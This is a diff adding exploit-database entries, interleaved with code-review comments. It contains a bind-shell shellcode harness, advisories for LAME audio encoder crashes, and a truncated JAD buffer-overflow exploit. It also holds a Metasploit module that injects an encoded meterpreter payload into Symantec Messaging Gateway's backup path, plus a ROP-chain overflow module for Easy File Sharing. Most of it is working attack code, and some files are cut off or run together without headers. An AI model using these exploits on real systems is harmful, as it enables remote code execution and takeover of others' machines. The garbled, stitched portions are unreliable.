+ mov al,102 ; make syscall for socketcall() + int 80h ; call the kernel!! 
+ + ; accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen) + inc ebx ; EBX(5) = SYS_ACCEPT = accept() + mov al,102 ; make syscall for socketcall() + int 80h ; call the kernel!! + + xchg eax,ebx ; Put socket descriptor in EBX and 0x5 in EAX + pop ecx ; POP 3 into ECX for counter + +loop: + ; int dup2(int oldfd, int newfd) + mov al,63 ; syscall for dup2() + int 80h ; call the kernel!! + dec ecx ; count down to zero + jns loop ; If SF not set, ECX not negative so continue looping + +done: + ; int execve(const char *filename, char *const argv[], char *const envp[]) + push dword 0x68732f2f ; PUSH hs// onto stack + push dword 0x6e69622f ; PUSH nib/ onto stack + mov ebx,esp ; put the address of "/bin//sh" into EBX via ESP + push eax ; PUSH nulls for string termination + mov ecx,esp ; store argv array into ECX via the stack or ESP + mov al,11 ; make execve() syscall or 11 + int 80h ; call then kernel!! + +*/ + +#include +#include + +unsigned char code[]= \ +"\x6a\x66\x58\x99\x53\x43\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5e\x52" +"\x66\x68\x11\x5c\x52\x6a\x02\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd" +"\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93" +"\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x2f\x2f\x73\x68\x68\x2f\x62" +"\x69\x6e\x89\xe3\x50\x89\xe1\xb0\x0b\xcd\x80"; + +int main() +{ + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} + diff --git a/platforms/linux/dos/42258.txt b/platforms/linux/dos/42258.txt new file mode 100755 index 000000000..40d806446 --- /dev/null +++ b/platforms/linux/dos/42258.txt 
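Review bot: `printf("Shellcode Length: %d\n", strlen(code))` passes a `size_t` to `%d`; `%zu` is the matching conversion. The two `#include` directives reach this page with no header names — presumably `<stdio.h>` and `<string.h>` for `printf` and `strlen`, which should be confirmed against the raw file since it may be an extraction artifact. `main` is declared `int` but has no `return` statement.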
@@ -0,0 +1,91 @@ +Description: +lame is a high quality MPEG Audio Layer III (MP3) encoder licensed under the LGPL. + +Few notes before the details of this bug. Time ago a fuzz was done by Brian Carpenter and Jakub Wilk which posted the results on the debian bugtracker. In cases like this, when upstream is not active and people do not post on the upstream bugzilla is easy discover duplicates, so I downloaded all available testcases, and noone of the bug you will see on my blog is a duplicate of an existing issue. Upstream seems a bit dead, latest release was into 2011, so this blog post will probably forwarded on the upstream bugtracker just for the record. + +The complete ASan output of the issue: + +# lame -f -V 9 $FILE out.wav +==27479==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f598d317f20 at pc 0x7f598d2b246b bp 0x7ffe780cf310 sp 0x7ffe780cf308 +READ of size 2 at 0x7f598d317f20 thread T0 + #0 0x7f598d2b246a in II_step_one /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/layer2.c:144:36 + #1 0x7f598d2b246a in decode_layer2_frame /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/layer2.c:375 + #2 0x7f598d29b377 in decodeMP3_clipchoice /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/interface.c:611:13 + #3 0x7f598d298c13 in decodeMP3 /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/interface.c:696:12 + #4 0x7f598d259092 in decode1_headersB_clipchoice /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/libmp3lame/mpglib_interface.c:149:11 + #5 0x7f598d25e94a in hip_decode1_headersB /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/libmp3lame/mpglib_interface.c:436:16 + #6 0x7f598d25e94a in hip_decode1_headers /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/libmp3lame/mpglib_interface.c:379 + #7 0x51e984 in lame_decode_fromfile /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:2089:11 + #8 0x51e984 in 
read_samples_mp3 /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:877 + #9 0x51e984 in get_audio_common /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:785 + #10 0x51e4fa in get_audio /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:688:16 + #11 0x50f776 in lame_encoder_loop /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/lame_main.c:456:17 + #12 0x50f776 in lame_encoder /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/lame_main.c:531 + #13 0x50c43f in lame_main /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/lame_main.c:707:15 + #14 0x510793 in c_main /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/main.c:470:15 + #15 0x510793 in main /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/main.c:438 + #16 0x7f598be51680 in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289 + #17 0x41c998 in _init (/usr/bin/lame+0x41c998) + +0x7f598d317f20 is located 0 bytes to the right of global variable 'alloc_2' defined in '/var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/l2tables.h:118:24' (0x7f598d317de0) of size 320 +SUMMARY: AddressSanitizer: global-buffer-overflow /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/layer2.c:144:36 in II_step_one +Shadow bytes around the buggy address: + 0x0febb1a5af90: 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 + 0x0febb1a5afa0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 + 0x0febb1a5afb0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 + 0x0febb1a5afc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0febb1a5afd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0febb1a5afe0: 00 00 00 00[f9]f9 f9 f9 f9 f9 f9 f9 00 00 00 00 + 0x0febb1a5aff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0febb1a5b000: 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 + 0x0febb1a5b010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0febb1a5b020: 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 + 0x0febb1a5b030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==27479==ABORTING +Affected version: +3.99.5 + +Fixed version: +N/A + +Commit fix: +N/A + +Credit: +This bug was discovered by Agostino Sarubbo of Gentoo. + +CVE: +N/A + +Reproducer: +https://github.com/asarubbo/poc/blob/master/00290-lame-globaloverflow-II_step_one + +Timeline: +2017-06-01: bug discovered +2017-06-17: blog post about the issue + +Note: +This bug was found with American Fuzzy Lop. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42258.zip diff --git a/platforms/linux/dos/42259.txt b/platforms/linux/dos/42259.txt new file mode 100755 index 000000000..5dacb304f --- /dev/null +++ b/platforms/linux/dos/42259.txt 
@@ -0,0 +1,91 @@ +Description: +lame is a high quality MPEG Audio Layer III (MP3) encoder licensed under the LGPL. + +Few notes before the details of this bug. Time ago a fuzz was done by Brian Carpenter and Jakub Wilk which posted the results on the debian bugtracker. In cases like this, when upstream is not active and people do not post on the upstream bugzilla is easy discover duplicates, so I downloaded all available testcases, and noone of the bug you will see on my blog is a duplicate of an existing issue. Upstream seems a bit dead, latest release was into 2011, so this blog post will probably forwarded on the upstream bugtracker just for the record. + +The complete ASan output of the issue: + +# lame -f -V 9 $FILE out.wav +==30801==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe82a515a0 at pc 0x7f56d24c9df7 bp 0x7ffe82a4ffb0 sp 0x7ffe82a4ffa8 +WRITE of size 4 at 0x7ffe82a515a0 thread T0 + #0 0x7f56d24c9df6 in III_dequantize_sample /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/layer3.c + #1 0x7f56d24a664f in decode_layer3_frame /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/layer3.c:1738:17 + #2 0x7f56d24733ca in decodeMP3_clipchoice /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/interface.c:615:13 + #3 0x7f56d2470c13 in decodeMP3 /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/interface.c:696:12 + #4 0x7f56d2431092 in decode1_headersB_clipchoice /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/libmp3lame/mpglib_interface.c:149:11 + #5 0x7f56d243694a in hip_decode1_headersB /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/libmp3lame/mpglib_interface.c:436:16 + #6 0x7f56d243694a in hip_decode1_headers /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/libmp3lame/mpglib_interface.c:379 + #7 0x51e984 in lame_decode_fromfile /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:2089:11 + #8 0x51e984 in 
read_samples_mp3 /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:877 + #9 0x51e984 in get_audio_common /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:785 + #10 0x51e4fa in get_audio /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:688:16 + #11 0x50f776 in lame_encoder_loop /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/lame_main.c:456:17 + #12 0x50f776 in lame_encoder /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/lame_main.c:531 + #13 0x50c43f in lame_main /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/lame_main.c:707:15 + #14 0x510793 in c_main /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/main.c:470:15 + #15 0x510793 in main /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/main.c:438 + #16 0x7f56d1029680 in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289 + #17 0x41c998 in _init (/usr/bin/lame+0x41c998) + +Address 0x7ffe82a515a0 is located in stack of thread T0 at offset 5024 in frame + #0 0x7f56d24a548f in decode_layer3_frame /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/layer3.c:1659 + + This frame has 4 object(s): + [32, 344) 'scalefacs' + [416, 5024) 'hybridIn' 0x1000505422b0: 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 + 0x1000505422c0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 + 0x1000505422d0: f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1000505422e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1000505422f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x100050542300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + 
Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==30801==ABORTING +Affected version: +3.99.5 + +Fixed version: +N/A + +Commit fix: +N/A + +Credit: +This bug was discovered by Agostino Sarubbo of Gentoo. + +CVE: +N/A + +Reproducer: +https://github.com/asarubbo/poc/blob/master/00294-lame-stackoverflow-III_dequantize_sample + +Timeline: +2017-06-01: bug discovered +2017-06-17: blog post about the issue + +Note: +This bug was found with American Fuzzy Lop. + +Permalink: +https://blogs.gentoo.org/ago/2017/06/17/lame-stack-based-buffer-overflow-in-iii_dequantize_sample-layer3-c + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42259.zip diff --git a/platforms/linux/local/42255.py b/platforms/linux/local/42255.py new file mode 100755 index 000000000..cbefa26a3 --- /dev/null +++ b/platforms/linux/local/42255.py 
@@ -0,0 +1,103 @@ +#!/usr/bin/python +# Exploit Author: Juan Sacco at KPN Red Team - http://www.kpn.com +# Developed using Exploit Pack - http://exploitpack.com - +# Tested on: GNU/Linux - Kali 2017.1 Release +# +# Description: JAD ( Java Decompiler ) 1.5.8e-1kali1 and prior is prone to a stack-based buffer overflow +# vulnerability because the application fails to perform adequate boundary-checks on user-supplied input. +# +# An attacker could exploit this vulnerability to execute arbitrary code in the +# context of the application. Failed exploit attempts will result in a +# denial-of-service condition. +# +# Vendor homepage: http://www.varaneckas.com/jad/ +# +# CANARY : disabled +# FORTIFY : disabled +# NX : ENABLED +# PIE : disabled +# RELRO : disabled +# +import os, subprocess +from struct import pack + +ropchain = "A"*8150 # junk +ropchain += pack(' "Symantec Messaging Gateway Remote Code Execution", + 'Description' => %q{ + This module exploits the command injection vulnerability of Symantec Messaging Gateway product. An authenticated user can execute a + terminal command under the context of the web server user which is root. + + backupNow.do endpoint takes several user inputs and then pass them to the internal service which is responsible for executing + operating system command. One of the user input is being passed to the service without proper validation. That cause an command + injection vulnerability. But given parameters, such a SSH ip address, port and credentials are validated before executing terminal + command. Thus, you need to configure your own SSH service and set the required parameter during module usage. + + This module was tested against Symantec Messaging Gateway 10.6.2-7. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/unexpected-journey-5-from-weak-password-to-rce-on-symantec-messaging-gateway/'], + ['CVE', '2017-6326'] + ], + 'DefaultOptions' => + { + 'SSL' => true, + 'RPORT' => 443, + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [[ 'Automatic', { }]], + 'Privileged' => true, + 'DisclosureDate' => "Apr 26 2017", + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RPORT(443), + OptString.new('USERNAME', [true, 'The username to login as']), + OptString.new('PASSWORD', [true, 'The password to login with']), + OptString.new('SSH_ADDRESS', [true, 'The ip address of your SSH service']), + OptInt.new('SSH_PORT', [true, 'The port of your SSH service', 22]), + OptString.new('SSH_USERNAME', [true, 'The username of your SSH service']), + OptString.new('SSH_PASSWORD', [true, 'The password of your SSH service']), + OptString.new('TARGETURI', [true, 'The base path to Symantec Messaging Gateway', '/']) + ] + ) + end + + def username + datastore['USERNAME'] + end + + def password + datastore['PASSWORD'] + end + + def ssh_address + datastore['SSH_ADDRESS'] + end + + def ssh_port + datastore['SSH_PORT'] + end + + def ssh_username + datastore['SSH_USERNAME'] + end + + def ssh_password + datastore['SSH_PASSWORD'] + end + + def auth + print_status("Performing authentication...") + + sid = '' + last_login = '' + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'brightmail', 'viewLogin.do') + }) + + if res && !res.get_cookies.empty? 
+ last_login = res.get_hidden_inputs.first['lastlogin'] || '' + sid = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || '' + else + fail_with(Failure::Unknown, "Didn't get cookie-set header from response.") + end + + cookie = '' + + # Performing authentication + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'brightmail', 'login.do'), + 'headers' => { + 'Referer' => "https://#{peer}/brightmail/viewLogin.do", + 'Connection' => 'keep-alive' + }, + 'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}", + 'vars_post' => { + 'lastlogin' => last_login, + 'userLocale' => '', + 'lang' => 'en_US', + 'username' => username, + 'password' => password, + 'loginBtn' => 'Login' + } + }) + + if res &&res.body =~ /Logged in/ + cookie = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] + print_good("Awesome..! Authenticated with #{username}:#{password}") + else + fail_with(Failure::Unknown, 'Credentials are not valid.') + end + + cookie + end + + def get_csrf_token(cookie) + + print_status('Capturing CSRF token') + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'brightmail', 'admin', 'backup', 'backupNow.do'), + 'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{cookie}", + }) + + csrf_token = nil + if res && res.code == 200 + match = res.body.match(/type="hidden" name="symantec.brightmail.key.TOKEN" value="(\w+)"\/>/) + if match + csrf_token = match[1] + print_good("CSRF token is : #{csrf_token}") + else + fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.') + end + else + fail_with(Failure::Unknown, 'Something went wrong.') + end + + csrf_token + end + + def exploit + + cookie = auth + csrf_token = get_csrf_token(cookie) + + # I want to get meterpreter instead of cmd shell but SPACE and some other characters are blacklisted. + # Note that, we always have one SPACE at the beginning of python payload. 
e.g: import base64,sys; + # Here is the thing, use perl payload with ${IFS} technique and deliver the real payload inside of it :) + # So we gonna execute a perl payload on server side which will execute our meterpreter python payload. + + cmd = "python -c \"#{payload.encoded}\"" + final_payload = cmd.to_s.unpack("H*").first + + p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'" + + # Ok. We are ready to go + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'brightmail', 'admin', 'backup', 'performBackupNow.do'), + 'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{cookie}", + 'vars_post' => { + 'pageReuseFor' => 'backup_now', + 'id' => '', + 'symantec.brightmail.key.TOKEN' => csrf_token, + 'backupData' => 'full', + 'customType' => 'configuration', + 'includeIncidentMessages' => 'true', + 'includeLogData' => 'true', + 'backupTo' => '2', + 'remoteBackupProtocol' => 'SCP', + 'remoteBackupAddress' => ssh_address, + 'remoteBackupPort' => ssh_port, + 'remoteBackupPath' => "tmp$(#{p})", + 'requiresRemoteAuthentication' => 'true', + 'remoteBackupUsername' => ssh_username, + 'remoteBackupPassword' => ssh_password, + } + }) + end + +end diff --git a/platforms/windows/dos/42253.html b/platforms/windows/dos/42253.html new file mode 100755 index 000000000..09f04e1dd --- /dev/null +++ b/platforms/windows/dos/42253.html @@ -0,0 +1,26 @@ + + + + + + + Y0U HAVE BEEN EXPL0ITED! + + + + + + + \ No newline at end of file diff --git a/platforms/windows/remote/42256.rb b/platforms/windows/remote/42256.rb new file mode 100755 index 000000000..4b50bbb18 --- /dev/null +++ b/platforms/windows/remote/42256.rb 
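Review bot: In `auth`, a rejected login is reported with `Failure::Unknown`, where `Failure::NoAccess` is the conventional code for bad credentials and `Failure::UnexpectedReply` for the missing Set-Cookie branch; the same applies to the `'Something went wrong.'` branch in `get_csrf_token`, so an operator cannot tell a credential problem from a transport problem. `print_good("Awesome..! Authenticated with #{username}:#{password}")` echoes the password into the console and log; printing only the username is sufficient. The listing on this page appears garbled: 42255.py breaks off at `ropchain += pack('` and the Ruby module that follows carries no file header, so the boundary between the two files cannot be verified here.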
@@ -0,0 +1,159 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::Tcp
+ #include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Easy File Sharing HTTP Server 7.2 POST Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a POST buffer overflow in the Easy File Sharing FTP Server 7.2 software.
+ },
+ 'Author' =>
+ [
+ 'bl4ck h4ck3r', #POC
+ 'Marco Rivoli ' #Metasploit
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'EDB', '42186' ],
+ ],
+ 'Privileged' => true,
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x1002280a } ],
+ ],
+ 'DefaultOptions' => {
+ 'RPORT' => 80,
+ 'EXITFUNC' => 'thread',
+ 'ENCODER' => 'x86/alpha_mixed'
+ },
+ 'DisclosureDate' => 'Jun 12 2017',
+ 'DefaultTarget' => 0))
+ end
+
+ def create_rop_chain
+ # rop chain generated with mona.py - www.corelan.be
+ rop_gadgets = [
+ # 0x00000000, # [-] Unable to find gadget to put 00000201 into ebx
+ 0x10015442, # POP EAX # RETN [ImageLoad.dll]
+ 0xFFFFFDFE, # -202
+ 0x100231d1, # NEG EAX # RETN [ImageLoad.dll]
+ 0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]| {PAGE_EXECUTE_READ}
+ 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
+ 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
+ 0x10015442, # POP EAX # RETN [ImageLoad.dll]
+ 0x1004de84, # &Writable location [ImageLoad.dll]
+ 0x10015442, # POP EAX # RETN [ImageLoad.dll]
+ 0x61c832d0, # ptr to &VirtualProtect() [IAT sqlite3.dll]
+ 0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
+ 0x61c0a798, # XCHG EAX,EDI # RETN [sqlite3.dll]
+ 0x1001d626, # XOR ESI,ESI # RETN [ImageLoad.dll]
+ 
0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll] + 0x100218f9, # POP EBP # RETN [ImageLoad.dll] + 0x61c24169, # & push esp # ret [sqlite3.dll] + 0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD 
CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x1001bd98, # POP ECX # RETN [ImageLoad.dll] + 0x1004de84, # &Writable location [ImageLoad.dll] + 0x61c373a4, # POP EDI # RETN [sqlite3.dll] + 
0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
+ 0x10015442, # POP EAX # RETN [ImageLoad.dll]
+ 0x90909090, # nop
+ 0x100240c2, # PUSHAD # RETN [ImageLoad.dll]
+ ].flatten.pack('V*')
+ return rop_gadgets
+ end
+
+ def exploit
+ sploit = rand_text_alpha_upper(2278)
+ rop_chain = create_rop_chain
+ sploit << rop_chain
+ sploit << "\x90" * 200
+ sploit << payload.encoded
+ sploit << rand_text_alpha_upper(1794 - 200 - payload.encoded.length - rop_chain.length)
+ sploit << [target.ret].pack('V')
+
+ request = "POST /sendemail.ghp HTTP/1.1\r\n\r\nEmail=#{sploit}&getPassword=Get+Password"
+ connect
+ sock.put(request)
+ handler
+ disconnect
+ end
+end
\ No newline at end of file
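Review bot: The Description in initialize names the "Easy File Sharing FTP Server 7.2" while the module Name, the default RPORT of 80 and the POST to /sendemail.ghp in exploit all address the HTTP server; the description should read `This module exploits a POST buffer overflow in the Easy File Sharing HTTP Server 7.2 software.`. The commented-out `#include Msf::Exploit::Remote::HttpClient` beside the Tcp mixin that is actually used is dead code and should be removed rather than left as a hint. Nothing bounds payload.encoded.length in exploit, so a payload longer than the 1794 - 200 - rop_chain.length budget hands a negative count to rand_text_alpha_upper and presumably produces a malformed buffer instead of a clear error; declaring `'Space'` in the Payload hash lets the framework reject oversize payloads up front. The 2278 and 1794 constants are undocumented; a comment such as `# 2278 bytes of filler, then ROP chain + NOP sled + payload + padding totalling 1794 bytes, then target.ret` would make the buffer layout clear to maintainers.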